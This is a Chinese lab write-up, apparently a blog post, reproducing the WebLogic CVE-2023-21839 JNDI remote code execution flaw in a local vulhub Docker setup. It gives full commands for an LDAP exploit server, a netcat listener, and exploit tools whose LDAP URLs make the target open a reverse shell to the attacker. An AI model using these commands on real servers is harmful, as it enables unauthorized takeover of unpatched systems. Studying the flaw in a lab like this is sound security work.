CVE-2023-21839漏洞本地简单复现

image.png

1. 说明

本文漏洞环境由vulhub下载后在本地部署:https://github.com/vulhub
本文漏洞利用工具1来源于:https://github.com/DXask88MA/Weblogic-CVE-2023-21839(可能是我利用姿势不太对,没成功)
本文漏洞利用工具2来源于:https://github.com/4ra1n/CVE-2023-21839
本文漏洞利用工具3来源于:https://github.com/WhiteHSBG/JNDIExploit

我主要是对漏洞进行了本地的简单复现,其中用到的工具都是各位大神的,我对4ra1n给的工具进行了编译。

2. 漏洞复现

2.1 漏洞原理

CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。
以上来源于:

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/README.zh-cn.md

2.2 环境搭建

下载之后在本地使用docker部署:

docker-compose up -d

image.png

访问本地:http://127.0.0.1:7001/,出现以下界面证明环境搭建成功:
image.png

然后访问:http://127.0.0.1:7001/console/,等待几秒之后,即可访问到后台管理登录界面。
image.png

使用原来的Weblogic漏洞RCE神器进行测试,偶然发现存在cve-2016-3510

image.png

2.3 漏洞复现-失败

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
kali上同时启动监听、命令执行、反弹shell的工作,先监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.30.0.214

image.png

然后在本地开启监听:

nc -lvnp 7777

image.png

使用下面的工具进行测试:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

命令(要记得使用java8的环境,不然会报错):

java -jar Weblogic-CVE-2023-21839.jar 10.30.0.214:7001 ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777


[*]java -jar 目标ip:端口 ldap地址
java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111


通过多次测试,发现还是有问题,能执行但是回不来:
可能是姿势不太对。。。
image.png
因为时间关系,暂时就不测试了。

2.4 漏洞复现2-成功

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
首先在kali上设置监听,用于接收反弹的shell
image.png

再通过kali上来设置监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.135.22

image.png

最后使用工具来进行攻击测试,使用工具来源于:https://github.com/4ra1n/CVE-2023-21839
将工具下载下来之后,在有go的环境中编译一下:

cd cmd
go build -o CVE-2023-21839

image.png

使用的时候,按照作者的方法来执行:

./CVE-2023-21839 -ip 10.30.0.214 -port 7001 -ldap ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
10.30.0.214为靶机
192.168.22.105为攻击机,也是接收反弹shell的ip

image.png

漏洞复现之后,记得及时关闭环境:
image.png

2.5 windows下工具使用

在这里使用windows版本的试下:
image.png

image.png

同样可以成功。

  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值